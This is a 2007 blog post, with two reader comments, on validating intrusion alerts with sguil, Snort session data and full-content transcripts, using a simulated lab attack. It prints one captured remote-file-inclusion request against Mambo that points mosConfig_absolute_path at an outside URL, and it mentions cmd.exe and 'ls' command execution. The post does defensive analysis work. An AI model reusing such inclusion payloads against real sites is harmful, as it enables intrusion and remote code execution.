Not only alert data Part III

Posted by ayoi | NSM,work and IT | Wednesday 21 March 2007 3:12 pm

OK this is the third part of this title. I am suppose to give trainings regarding log analysis and events or incidents validation. Actually I planned to publish this post as soon as the 2nd part finished but alas I have few obligations that require my full attention (and even I am only half way of completing my so called whitepapers).

So far the main things that I always ranting/mumbling/complaint about is the lack of neccessary data to assist me in validating incidents. While at The Client site, I realized this “handicap” when The Client asking me regarding the validity of the incidents or events.

“Cemane kita tau attempt ni successful or not?” (how do we know whether the attempt is successful or not)

“Ape lagi yang dia buat actually?” (What did the attacker do actually?)

“When did the attack start?”

“Apsal the hacker attack subdomain instead of the main domain?”(Why did the hacker attack the subdomain instead of the main domain?)

(ok this question is lil bit funny for me to answer, usually I just answer “This question, you have to ask the attacker himself. I am no jedi master to know what are his intentions”

All the questions (ok excluding the last one) can be answered with the assistance of full content, session and alerts data. The events/incidents validation process will become more reliable, more trustworthy and I think less debatable instead of searching all the related alerts only based on the attackers IP. We may list down all the alerts related to the attacker but can we identify when the exact time or the exact alerts showing that the attacker successfuly penetrated the victim? Like I said, validating incidents/events or alerts based only the alerts information is more likely a guessing game.

Now let me show you why having those data are really important.

As I dun have any port mirroring privilleged to sniff any other network, so I just let my sensor do the attacking.

I have sguil 0.6.1 (server and sensor including the agents), mysql 5.0.33, snort installed on one machine (FreeBSD 6.2 Release). Why FreeBSD? because of ports. TQ 😀 (I am a lazy brat ok?),

The targeted system is using FreeBSD 6.1, with Mysql 4.1, apache 1.3.37.

So I did make some simulation attack on my vmware by using nikto and remote file inclusion.

Here is the list of alerts generated by those activities. (My sguil client run on windows XP)


Lil bit explanation on the interface. ST = Status (where RT = Real Time); CNT = Count; Sensor = sensor name; Alert ID; Date/Time; Src IP = Source IP; SPort = Source Port; Dst IP = Destination IP; DPort = Destination Port; Pr = Protocol(Where 6 = TCP; 17 = UDP; 1 = ICMP)

You can see that on the lower left hand side, there’re tabs for IP Resolution (Src and Dst), Sensor Status (Sensor ID, Sensor, Last Alert, Agent and BY = Barnyard), Snort Statistics (Sensor ID, Sensor, Packet Loss -%, Average Bandwidth -Mb/s, Alerts – per second, Packets – k/sec, and Bytes – /packet), System message and User message.

On the lower right hand side you can see the packet details including the payload. You can see the rules detail as well.

Now let us concentrate on Alert ID 1.254 = WEB-PHP Remote include path.


It seems that there are 35 remote file inclusion attempts from to Let us see the correlated events


the details of the events


And this is the payload

GET /mambo/index.php?_REQUEST=&_
mosConfig_absolute_path=http://1 H
TTP/1.1..User-Agent: Mozilla/5.0
(compatible; Konqueror/3.5; Fre
eBSD) KHTML/3.5.5 (like Gecko)..
Accept: text/html, image/jpeg, i
mage/png, text/*, image/*, */*..
Accept-Encoding: x-gzip, x-defla
te, gzip, deflate..Accept-Charse
t: iso-8859-1, utf-8;q=0.5, *;q=
0.5..Accept-Language: en..Host: Keep-

From the payload itself we can identify that the attacker is trying to exploit the MOS bugs and GLOBAL overwrite issues. Again, the basic question arises here. Is vulnerable to the attack? Is the attack successful?

That’s the beauty of using sguil as currently it does collect session data by using SANCP (Security Analyst Network Connection Profiler) , full content data (with the and of cause alerts data from snort itself. So far I haven’t seen any other applications that do the same thing. Maybe in the future we can try to include these data collection mechanism into our systems.

For our case, we can just retrieve the communication transcript for the event. And below is the result :


It seems that the attacker is trying to execute cmd.exe over http but the server give a 404 response meaning the attempt is not successful

But for the mambo inclusion attempt it seems that the server is vulnerable to the attack. See the 200 response. You can refer here to read about apache server status.

You can see that the attacker is executing the ls command as well


Or you can also use wireshark to see the content of the communication. Follow the stream bebeh 😀



You might ask me when did i used the session data? I will use that when I try to locate one particular IP from others. (In this simulation there’re only 2 IP) It is more to identify the communication that might not triggered the alert besides to look what other conversation that the source/dst ip might get involved besides the ones that triggered the alert.

I do wish that somebody who is willing to correct me or introduce the other method of validating incidents/events or alerts.






(Visited 118 times, 1 visits today)


  1. Comment by Hanashi — March 21, 2007 @ 8:16 pm

    Great example! This is exactly how Sguil was designed to be used. Personally, I find myself using transcripts to answer probably 80% or 90% of all my questions when I’m processing alerts, and that saves me tons of time.

    As for the session data, I’ve also had very good results in using it to identify additional events using some basic traffic analysis. With a little SQL-foo, it’s pretty easy to spot scanners, for example. I also correlate session data with PHP injection attack attempts as a rudimentary way to see if any where successful. Datamining the SQL db is big interest of mine, and most of that hinges on the session data.

  2. Comment by ayoi — March 21, 2007 @ 8:50 pm

    Kewl, hopefully we can share the method as well. Especially on db data mining 😀

RSS feed for comments on this post.

Leave a comment